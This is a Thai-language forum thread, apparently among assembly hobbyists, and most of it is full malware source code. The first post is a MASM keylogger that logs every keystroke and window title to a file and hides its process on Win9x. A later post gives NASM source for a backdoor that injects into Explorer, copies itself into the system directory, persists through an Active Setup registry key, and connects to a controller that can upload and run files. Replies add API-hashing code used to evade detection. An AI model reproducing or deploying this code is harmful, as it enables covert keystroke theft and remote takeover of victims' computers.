ดักจับ keyboard (Keylogger) ดักได้ทุกภาษา [Masm]

โค้ดนี้ เป็นตัวอย่าง การจับ keyboard ที่สำคัญ ไม่ได้ใช้ timer ด้วย :P

ได้แนวความคิดมาจาก http://goragod.mwfhost.com/view.php?module...vb&wb_id=53

โดยส่วนตัวไม่ค่อยชอบ VB (เมื่อก่อนเคยชอบ) เลยเอามาแปลงเป็น Masm ซ้ะ :lol:

2.5 k Unpack
1.5k Pack กับ FSG2.0 :blink:

Quote:

.486
.model flat, stdcall

.nolist
include C:\masm32\include\kernel32.inc
include C:\masm32\include\windows.inc
include C:\masm32\include\user32.inc
include C:\masm32\include\wininet.inc
include C:\masm32\include\advapi32.inc
include c:\masm32\include\masm32.inc

.list
includelib C:\masm32\lib\kernel32.lib
includelib C:\masm32\lib\user32.lib
includelib C:\masm32\lib\wininet.lib
includelib C:\masm32\lib\advapi32.lib
includelib c:\masm32\lib\masm32.lib

JournalLogHook PROTO :DWORD, :DWORD, :DWORD

.data
bracket1 db "<"
bracket2 db ">"
linefeed db 13,10,13,10,"[> %s <]",13,10,0;
isLogging dd 1
vKey dd 0
nScan dd 0
dwCount dd 0
schar db 2 dup (0)

logfileN db "log.txt", 16 dup(0)
kernel_name db "kernel32.dll", 0
kernel_function db "RegisterServiceProcess", 0

.data?
logfile db 261 dup (?)
hinstance HINSTANCE ?
aMsg MSG <?>
LogHook dd ?
svBuffer dword ?
kBuffer db 256 dup (?)
kFwin db 256 dup (?)
kGkl db 256 dup (?)
wBuffer db 512 dup (?)
chcount dd ?
dwBytes dd ?
aFocus dd ?
lFocus dd ?
lastvKey dd ?

.code

JournalLogHook proc uses edi code:DWORD, wParam:WPARAM, lParam:LPARAM
LOCAL filehandle:dword

.if code < 0
invoke CallNextHookEx, LogHook, code, wParam, lParam
ret
.endif

.if code == HC_ACTION
mov edi, lParam
assume edi:ptr EVENTMSG

.if [edi].message == WM_KEYDOWN
mov eax, [edi].paramL
mov ah, 0
mov vKey, eax
mov eax, [edi].paramL
mov al, 0
shl eax, 8
mov nScan, eax

invoke CreateFile, addr logfileN,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
mov filehandle, eax
invoke SetFilePointer, filehandle,NULL, NULL, FILE_END
invoke GetKeyNameText, nScan,addr svBuffer, 256

mov dwCount, eax
invoke GetActiveWindow
mov aFocus, eax

.if eax != lFocus
mov lFocus, eax
invoke GetWindowText, aFocus, addr kBuffer, 256
mov chcount, eax

.if chcount > 0
invoke wsprintf, addr wBuffer, addr linefeed, addr kBuffer
invoke lstrlen, addr wBuffer
mov chcount, eax
invoke WriteFile, filehandle, addr wBuffer, chcount, addr dwBytes, NULL
.endif
.endif

.if dwCount > 0
.if vKey == VK_SPACE
mov svBuffer, 32
mov svBuffer + 1, 0
mov dwCount, 1
.endif

.if vKey == VK_CAPITAL
mov svBuffer,0
mov dwCount,1
.endif

.if vKey == VK_SHIFT
mov svBuffer,0
mov dwCount,1
.endif

.if dwCount == 1

.if lastvKey != 186
invoke GetKeyboardState, addr kBuffer

invoke GetForegroundWindow
invoke GetWindowThreadProcessId,eax,0
invoke GetKeyboardLayout ,eax;

invoke ToAsciiEx, vKey, nScan, addr kBuffer, addr schar, 0 ,eax ;| Ex Method .....

mov chcount, eax

.else
mov chcount, 1
mov eax, vKey
mov schar, al
.endif

.if chcount > 0
invoke WriteFile, filehandle, addr schar, chcount, addr dwBytes, NULL
.endif

.else

invoke WriteFile, filehandle, addr bracket1, 1, addr dwBytes, NULL
invoke WriteFile, filehandle, addr svBuffer, dwCount, addr dwBytes, NULL
invoke WriteFile, filehandle, addr bracket2, 1, addr dwBytes, NULL

.if vKey == VK_RETURN
invoke WriteFile, filehandle, addr linefeed, 2, addr dwBytes, NULL
.endif
.endif

mov eax, vKey
mov lastvKey, eax
.endif

invoke CloseHandle, filehandle
.endif
.endif

invoke CallNextHookEx, LogHook, code, wParam, lParam
ret
JournalLogHook endp

start:
;try to hide in non NT enviroment
invoke GetModuleHandle, ADDR kernel_name
invoke GetProcAddress, eax, ADDR kernel_function

.if eax != NULL
push 1
push 0
call eax
.endif

invoke GetModuleHandle, NULL
mov hinstance, eax

invoke SetWindowsHookEx, WH_JOURNALRECORD,addr JournalLogHook,hinstance, NULL
mov LogHook, eax

.while isLogging == 1
invoke WaitMessage
invoke GetMessage, addr aMsg, NULL, 0, 0

.if aMsg.message == WM_CANCELJOURNAL

mov edi, offset kBuffer
mov ecx, 64
xor eax, eax
rep stosd
invoke SetKeyboardState, addr kBuffer

invoke SetWindowsHookEx, WH_JOURNALRECORD,addr JournalLogHook,hinstance, NULL
mov LogHook, eax
.endif
.endw

invoke UnhookWindowsHookEx,addr LogHook
invoke ExitProcess, 0

end start

[/b]

เดี๋ยวนี้เรียก API แต่ละทีก็ include include เข้ามา

เมื่อก่อนนะต้องมานั่งหา address

ถ้านายไม่ include น่าจะได้ code เล็กกว่านี้นะ

Quote:

เดี๋ยวนี้เรียก API แต่ละทีก็ include include เข้ามา

เมื่อก่อนนะต้องมานั่งหา address

ถ้านายไม่ include น่าจะได้ code เล็กกว่านี้นะ
[/b]

Code เล็ก กับได้ไฟล์ที่ Assembled(compiled) แล้วเล็ก ต่างกันนี้ครับ
อยู่ที่ Assembler (compiler) ด้วยครับ : )

Quote:

เดี๋ยวนี้เรียก API แต่ละทีก็ include include เข้ามา

เมื่อก่อนนะต้องมานั่งหา address

ถ้านายไม่ include น่าจะได้ code เล็กกว่านี้นะ[/b]

คล้ายๆ แบบนี้เหรอ :D ที่ใช้ API Hash Address มัน code ยาวมากๆ ผิดซักตัวอักษรเดียวนั่งหา แทบบ้าเลย
และปัญหา Os อีก ....

dll001 db "KERNEL32.DLL",0
dll002 db "USER32",0
dll003 db "SHELL32",0

; ======= API Hash Address

__LoadLibraryA dd 0A412FD89h
__WinExec dd 0016EF74Bh
__CreateProcessA dd 08EF94368h
__Sleep dd 00005F218h
__DeleteFileA dd 049462A7Bh
__GetModuleFileNameA dd 060F43F1Bh
__GetSystemDirectoryA dd 0B8E579C1h
__CopyFileA dd 04F182A69h
__CreateFileA dd 038C62A7Ah
__WriteFile dd 058D8C545h
__CloseHandle dd 0C0D6D616h

__RegSetValueExA dd 09775A748h
__RegCreateKeyA dd 0A718D938h
__RegDeleteKeyA dd 08928D938h
__RegCloseKey dd 0C6E06B86h

__GetComputerNameA dd 0BA2070DFh
__GetVersion dd 052ED5F54h

__FindWindowA dd 0ABEEB02Bh
__GetWindowThreadProcessId dd 0850BA256h

คนเก่งๆทั้งหลายมาสอนหน่อย ซิ่ ผมเองยังไปไม่ถึงไหนเลย asm เนี่ยเอาเวลา อู้งานมาอ่าน เลยไม่ค่อยมีเวลามาก :P

ไม่เข้าใจว่าจะ Hash ทำไม่หรือครับ? อันนี้ cut มาจากไหนหรือครับ?

เข้าใจล่ะแต่ทำไมต้อง compare api name hash กับ prehash value หรือว่าเพราะเรื่อง speed? หรือว่าต้องการ hide?

Quote:

ไม่เข้าใจว่าจะ Hash ทำไม่หรือครับ? อันนี้ cut มาจากไหนหรือครับ?[/b]

Quote:

เข้าใจล่ะแต่ทำไมต้อง compare api name hash กับ prehash value หรือว่าเพราะเรื่อง speed? หรือว่าต้องการ hide?[/b]

จาก มีคนให้ความเห็นว่า การ include พวก lib ต่างๆ เข้าไป ไฟล์มันใหญ่ ผมเลยปิ๊ง ไอเดีย
จาก nasm คือการใช้ API Hash Address แค่นั้นเอง เพียงแค่จะบอกว่าทำได้ แต่ไม่คุ้มกับ เวลาที่เสีย
ไม่เกิดประโยชน์ ไฟล์ขนาดลดลง 2k แต่มีภาระเพิ่มอีกมากมาย

Quote:

.nolist
include C:\masm32\include\kernel32.inc
include C:\masm32\include\windows.inc
include C:\masm32\include\user32.inc
include C:\masm32\include\wininet.inc
include C:\masm32\include\advapi32.inc
include c:\masm32\include\masm32.inc

.list
includelib C:\masm32\lib\kernel32.lib
includelib C:\masm32\lib\user32.lib
includelib C:\masm32\lib\wininet.lib
includelib C:\masm32\lib\advapi32.lib
includelib c:\masm32\lib\masm32.lib[/b]

function นี้อย่างเด็ด แนะนำ :D

Quote:

; get kernel32 base
GetKernel32:
mov eax, [fs:30h]
test eax, eax
js @@os_9x

@@os_nt:
mov eax, [eax + 0ch]
mov esi, [eax + 1ch]
lodsd
mov eax, [eax + 08h]
jmp short @@finished

@@os_9x:
mov eax, [eax+034h]
mov eax, [eax+0b8h]

@@finished:
;retn

; HashGetProcAddress thank coban2k
GetFunctions:
xchg eax, ebp
mov eax, dword [ebp+03Ch] ; PE
mov eax, dword [ebp+eax+078h]; Export Table RVA
lea esi, [ebp+eax+018h] ; Export Table VA+18h
lodsd
xchg eax, ecx ; NumberOfNames
lodsd ; AddressOfFunctions
push eax
lodsd ; AddressOfNames
add eax, ebp
xchg eax, edx
lodsd ; AddressOfNameOrdinals
add eax, ebp
push eax
xchg esi, edx

@next_func:
lodsd
add eax, ebp
xor edx, edx

@calc_hash:
rol edx, 3
xor dl, byte [eax]
inc eax
cmp byte [eax], 0
jnz @calc_hash

mov edi, ebx

@scan_dw_funcs:
cmp dword [edi], edx
jnz @Skip_function

mov eax, dword [esp]
movzx eax, word [eax]
shl eax, 2
add eax, dword [esp+4]
mov eax, dword [eax+ebp]
add eax, ebp
stosd

@Skip_function:
scasd

cmp dword [edi], 0
jnz @scan_dw_funcs

add dword [esp], 2
loop @next_func

pop eax
pop eax
ret[/b]

------------------------------------------------------------

มาดู ต.ย โปรแกรมไรไม่บอกแต่ไม่อันตรายรับรอง แต่ av จับได้ (Coder:Anskya) ที่เขียนด้วย nasm ใช้ API Hash Address ไม่มีการ include พวก lib เข้าไปเลย
ลอง compile ดู 1.71 k เท่านั้น ต้องแปลงจาก masm เป็น nasm ไฟล์เล็ก แต่ Bug เพียบ.......

Quote:

[BITS 32]
%define CODE_BASE 1000h
%define DATA_BASE CODE_BASE
%define RVADIFF 1000h-200h
%define imagebase 00400000h
%define reloc RVADIFF+imagebase

%define MAX_PATH 260

MZ_Header:
.magic dw "MZ"
.cblp dw 0
.cp dw "IC"
.crlc dw "IK"
.cparhdr dw "O"
.minalloc dw 0
;.cblp dw "[C"
;.cp dw "]A"
;.crlc dw "ns"
;.cparhdr dw "ky"
;.minalloc dw "a"

PE_Header:
.Signature dd "PE"
.Machine dw 14Ch
.NumberOfSections dw 1

IAT_User32:
.TimeDateStamp dd 0
.PointerToSymbolTable dd 0
.NumberOfSymbols dd 0
.SizeOfOptionalHeader dw 0E0h
.Characteristics dw 103h

Optional_Header:
.Magic dw 10Bh
.MajorLinkerVersion db 0
.MinorLinkerVersion db 0
.SizeOfCode dd CODE_BASE
.SizeOfInitializedData dd 0
.SizeOfUninitialzedData dd 0

.AddressOfEntryPoint dd code+RVADIFF
.BaseOfCode dd 1000h
;.BaseOfData dd DATA_BASE
.lfanew dd 0Ch
;DOS STUB
;align 16, DB 0
.ImageBase dd imagebase
.SectionAlignment dd 1000h
.FileAlignment dd 200h
.MajorOperSystemVersion dw 4h
.MinorOperSystemVersion dw 0h
.MajorImageVersion dw 0h
.MinorImageVersion dw 0h
.MajorSubsystemVersion dw 4
.MinorSubsystemVersion dw 0
.Reserved1 dd 0h
.SizeOfImage dd 2000h
.SizeOfHeaders dd import
.CheckSum dd 0h
.Subsystem dw 2 ;105 106----PE,2=Win32 GUI,3=Win32 Console
.DllCharacteristics dw 0h

.SizeOfStackReserve1 dd 100000h
.SizeOfStackCommit1 dd 2000h
.SizeOfStackReserve2 dd 100000h
.SizeOfStackCommit2 dd 1000h

.LoaderFlags dd 0h
.NumberOfRvaAndSizes dd 10h

Data_Directories:
.Export times 2 dd 0h
.Import dd import+RVADIFF, import_end-import
.Resource times 2 dd 0
.Exception times 2 dd 0h
.Security times 2 dd 0h
.Relocation times 2 dd 0h
.Debug times 2 dd 0h
.Architecture times 2 dd 0h
.GlobalPtr times 2 dd 0h
.TLS times 2 dd 0h
.LoadConfig times 2 dd 0h
.BoundImport times 2 dd 0h
.IAT times 2 dd 0h
.DelayImport times 2 dd 0h
.ComDescriptor times 2 dd 0h
.Reserved times 2 dd 0h

;PE?----
sections:
.SectionName db "xxxxx",0
.VirtualSize dd 1000h
.VirtualAddress dd 1000h
.SizeOfRawData dd code_end-import
.PointerToRawData dd import
.PointerToRelocations dd 0h
.PointerToLinenumbers dd 0h
.NumberOfRelocations dw 0h
.NumberOfLinenumbers dw 0h
.Characteristics dd 0E00000D0h

;===============================================================================
============

; Explorer
Find_Process:
push 11h
pop ecx
@loop_push1:
push edi
loop @loop_push1

push esp
push esp
push 7
pop ecx
@loop_push2:
push edi
loop @loop_push2

lea eax, [reloc + __GetCurrentPath]
push eax
call [reloc + __CreateProcessA]

push 11h
pop ecx
@loop_pop:
pop eax
loop @loop_pop

popad
retn

; Win9x
Inject_Win9x:
push 40h
push 08003000h
push ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH * 2)
push edi
call [reloc + __VirtualAlloc]

; Write Memory
push 8
push edi
push eax
push edi
push ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH)
lea edx, [reloc + __RemoteCodeStart]
push edx
push eax
push esi
call [reloc + __WriteProcessMemory]

; CreateRemoteThread For Win9x
call [reloc + __GetCurrentProcessId]
xor eax, [fs:030h]
xor ebx, eax
mov esi, [reloc + __DebugActiveProcess]

; CreateRemoteThread9x
@search_crt9x:
inc esi
cmp dword [esi], 0E857FFFFh
jnz @search_crt9x

lodsd
lodsd
add eax, esi
push -1000h
push ebx
call eax

; OpenThread9x
push edi
push eax
mov esi, [reloc + __OpenProcess]
@search_opt9x:
inc esi
cmp dword [esi], 0E832FF50h
jnz @search_opt9x
lodsd
lodsd
add eax, esi
push ebx
call eax
popad
retn

dll002 db "USER32",0
__ExplorerWindow db 'shell_traywnd',0

align 200h, DB 0

import dd 0
dd 0
dd -1
dd dll001+RVADIFF
dd api001+RVADIFF

times 5 dd 0 ;NULL DLL ENTRY

dll001 db "KERNEL32.DLL",0

;kernel32 apis
api001 dd api101+RVADIFF
dd 0

api101 dw 0
db "ExitProcess",0

import_end:

code:
pushad

lea ebx, [reloc + __LoadLibraryA]
call GetKernel32

lea eax, [imagebase + dll002]
push eax
call [reloc + __LoadLibraryA]
call GetFunctions

xor edi, edi

push MAX_PATH
lea eax, [reloc + __GetCurrentPath]
push eax
push edi
call [reloc + __GetModuleFileNameA]

push 1024
call [reloc + __Sleep]

;Debug
;call RemoteCode

push edi
lea eax, [imagebase + __ExplorerWindow]
push eax
call [reloc + __FindWindowA]
test eax, eax
jnz @Inject_Process

lea eax, [imagebase + Find_Process]
jmp eax

; (Explorer)
@Inject_Process:
push eax
push esp
push eax
call [reloc + __GetWindowThreadProcessId]
pop eax
xchg eax, ebx

push ebx
push edi
push 01F0FFFh
call [reloc + __OpenProcess]
xchg eax, esi

; Win9x
call [reloc + __GetVersion]
cmp eax, 080000000h
jb @Inject_WinNT

; Win9x
lea eax, [imagebase + Inject_Win9x]
jmp eax

@Inject_WinNT:
push 40h
push 3000h
push ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH * 2)
push edi
push esi
call [reloc + __VirtualAllocEx]

push eax
push esp
push edi
push edi
push eax
push edi
push ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH)
lea ebx, [reloc + __RemoteCodeStart]
push ebx
push eax
push esi
call [reloc + __WriteProcessMemory]

push edi
push edi
push esi
call [reloc + __CreateRemoteThread]
pop eax

popad
retn
;=============================================
; RemoteCode
__RemoteCodeStart:
RemoteCode:
pushad
call @Start
@Start:
pop ebx
add ebx, (__LoadLibraryA - @Start)

; Load WS2_32
push '32'
push 'ws2_'
push esp
call [ebx + (__LoadLibraryA - __LoadLibraryA)] ; LoadLibraryA
call GetFunctions

; Load Advapi32
push 0
push 'pi32'
push 'adva'
push esp
call [ebx + (__LoadLibraryA - __LoadLibraryA)] ; LoadLibraryA
call GetFunctions

push 5
pop ecx
@@Loop_Pop:
pop eax
loop @@Loop_Pop

push MAX_PATH
lea edi, [ebx + (__GetCurrentPath - __LoadLibraryA) + MAX_PATH]
push edi
call [ebx + (__GetSystemDirectoryA - __LoadLibraryA)]

push edi
add edi, eax
lea esi, [ebx + (__SetupFileName - __LoadLibraryA)]

push 15
pop ecx
rep movsb
pop edi

; push edi
; call [ebx + (__DeleteFileA - __LoadLibraryA)]
;
; Copy File
push 0
push edi
lea eax, [ebx + (__GetCurrentPath - __LoadLibraryA)]
push eax
call [ebx + (__CopyFileA - __LoadLibraryA)]

push esi
lea eax, [ebx + (__ActiveRegedir - __LoadLibraryA)]
push eax
push 080000002h
call [ebx + (__RegCreateKeyA - __LoadLibraryA)]

push 0b4h
push edi
push 1
push 0
lea eax, [ebx + (__ActiveSetup - __LoadLibraryA)]
push eax
push dword [esi]
call [ebx + (__RegSetValueExA - __LoadLibraryA)]

push dword [esi]
call [ebx + (__RegCloseKey - __LoadLibraryA)]

;WSAStartup
sub esp, 0800h
mov edi, esp
push edi
push 1
call [ebx + (__WSAStartup - __LoadLibraryA)]

@Loop_Online:
;closesocket
push ebp
call [ebx + (__closesocket - __LoadLibraryA)]

;socket
push 6
push 1
push 2
call [ebx + (__socket - __LoadLibraryA)]

xchg eax, ebp
lea eax, [ebx + (__ActiveRegedir - __LoadLibraryA)]
push eax
push 080000001h
call [ebx + (__RegDeleteKeyA - __LoadLibraryA)]

@Loop_connect:
;Sleep
push 0800h
call [ebx + (__Sleep - __LoadLibraryA)]

lea eax, [ebx + (__MasterAddress - __LoadLibraryA)]
push eax
call [ebx + (__gethostbyname - __LoadLibraryA)]
test eax, eax
je @Loop_connect

mov eax, dword [eax + 0ch]
mov eax, dword [eax]
push dword [eax]
push 0FE120002h
pop dword [edi]
pop dword [edi + 4]

;connect
push 010h
push edi
push ebp
call [ebx + (__connect - __LoadLibraryA)]
jnz @Loop_Online

push 0

;GetComputerNameA
push 010h
push esp
push edi
call [ebx + (__GetComputerNameA - __LoadLibraryA)]

jmp short @Send_OnlineInfo

;
@Recv_Buffer:
push 0
push 0800h
push edi
push ebp
call [ebx + (__recv - __LoadLibraryA)]
inc eax
je @Loop_Online
dec eax
je @Loop_Online

mov dh, byte [edi]
inc edi
call @Create_File
dec edi

;
@Send_Buffer:
push 0
push 2
@Send_OnlineInfo:
push edi
push ebp
call [ebx + (__send - __LoadLibraryA)]
@Send_Loop:
jmp short @Recv_Buffer

;
@Parse_Cmd:

@Parse_Done:
mov byte [edi], 78h
retn

@Create_File:
dec dh
jnz @Wirte_File

xor ecx, ecx
push ecx
push ecx
push 2
push ecx
push ecx
push 040000000h
push edi
call [ebx + (__CreateFileA - __LoadLibraryA)]
inc eax
je @Parse_Done
dec eax
xchg eax, esi
retn

@Wirte_File:
dec dh
jnz @Close_File
dec eax

push 0
push ecx
push eax
push edi
push esi
call [ebx + (__WriteFile - __LoadLibraryA)]
test eax, eax
je @Parse_Done
retn

@Close_File:
dec dh
jnz @Parse_UnInstall

push esi
call [ebx + (__CloseHandle - __LoadLibraryA)]

@Execute_File:
push 0Ah
push edi
call [ebx + (__WinExec - __LoadLibraryA)]
cmp eax, 31
jns @Parse_Done
retn

@Parse_UnInstall:
dec dh
jnz @Close_Socket

;
lea eax, [ebx + (__ActiveRegedir - __LoadLibraryA)]
push eax
push 080000002h
call [ebx + (__RegDeleteKeyA - __LoadLibraryA)]
;
lea eax, [ebx + (__GetCurrentPath - __LoadLibraryA) + MAX_PATH]
push eax
call [ebx + (__DeleteFileA - __LoadLibraryA)]
jmp @Close_SocketProc

@Close_Socket:
dec dh
jnz @Parse_Ping

@Close_SocketProc:
push ebp
call [ebx + (__closesocket - __LoadLibraryA)]
pop eax

; exit
@Exit_Loop:
add esp, 0800h
popad
retn

@Parse_Ping:
dec dh
jnz @Parse_Is9x
mov byte [edi], 32h
ret

@Parse_Is9x:
dec dh
jnz @Parse_Exit

call [ebx + (__GetVersion - __LoadLibraryA)]
cmp eax, 080000000h
jnb @Parse_Exit
inc byte [edi]

@Parse_Exit:
retn

;=============================================
; get kernel32 base
GetKernel32:
mov eax, [fs:30h]
test eax, eax
js @@os_9x

@@os_nt:
mov eax, [eax + 0ch]
mov esi, [eax + 1ch]
lodsd
mov eax, [eax + 08h]
jmp short @@finished

@@os_9x:
mov eax, [eax+034h]
mov eax, [eax+0b8h]

@@finished:
;retn

; HashGetProcAddress thank coban2k
GetFunctions:
xchg eax, ebp
mov eax, dword [ebp+03Ch] ; PE
mov eax, dword [ebp+eax+078h]; Export Table RVA
lea esi, [ebp+eax+018h] ; Export Table VA+18h
lodsd
xchg eax, ecx ; NumberOfNames
lodsd ; AddressOfFunctions
push eax
lodsd ; AddressOfNames
add eax, ebp
xchg eax, edx
lodsd ; AddressOfNameOrdinals
add eax, ebp
push eax
xchg esi, edx

@next_func:
lodsd
add eax, ebp
xor edx, edx

@calc_hash:
rol edx, 3
xor dl, byte [eax]
inc eax
cmp byte [eax], 0
jnz @calc_hash

mov edi, ebx

@scan_dw_funcs:
cmp dword [edi], edx
jnz @Skip_function

mov eax, dword [esp]
movzx eax, word [eax]
shl eax, 2
add eax, dword [esp+4]
mov eax, dword [eax+ebp]
add eax, ebp
stosd

@Skip_function:
scasd

cmp dword [edi], 0
jnz @scan_dw_funcs

add dword [esp], 2
loop @next_func

pop eax
pop eax
ret

; =======API Hash Address
__FunAddress:
__LoadLibraryA dd 0A412FD89h
__WinExec dd 0016EF74Bh
__CreateProcessA dd 08EF94368h
__Sleep dd 00005F218h
__DeleteFileA dd 049462A7Bh
__GetModuleFileNameA dd 060F43F1Bh
__GetSystemDirectoryA dd 0B8E579C1h
__CopyFileA dd 04F182A69h
__CreateFileA dd 038C62A7Ah
__WriteFile dd 058D8C545h
__CloseHandle dd 0C0D6D616h

__closesocket dd 0C0CBAF87h
__connect dd 001BDA62Ch
__gethostbyname dd 0208651E9h
__send dd 00000FC54h
__socket dd 0003FAF9Ch
__recv dd 00000FE2Eh
__WSAStartup dd 0E250EADAh

__RegSetValueExA dd 09775A748h
__RegCreateKeyA dd 0A718D938h
__RegDeleteKeyA dd 08928D938h
__RegCloseKey dd 0C6E06B86h

__GetComputerNameA dd 0BA2070DFh
__GetVersion dd 052ED5F54h

__FindWindowA dd 0ABEEB02Bh
__GetWindowThreadProcessId dd 0850BA256h

__OpenProcess dd 029BF2CBBh
__VirtualAllocEx dd 0C5B429FAh
__WriteProcessMemory dd 0B04AD555h
__CreateRemoteThread dd 04A5F66C2h

__DebugActiveProcess dd 031978FE3h
__GetCurrentProcessId dd 06D5EA21Eh
__VirtualAlloc dd 0AB16D0AEh

__ActiveSetup db 'StubPath',0

;__MasterPort dd 0FE120002h
__MasterAddress db '127.0.0.1',0
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0

__ActiveRegedir db 'SOFTWARE\Microsoft\Active Setup\Installed Components\'
__ActiveRegHex db '{2A202488-F02D-11cf-64CD-1123AFEECF20}',0

__SetupFileName db '\msvrhost32.exe',0

__GetCurrentPath:
__RemoteCodeEnd:

%define RemoteCodeSize $ - RemoteCode

code_end:
[/b]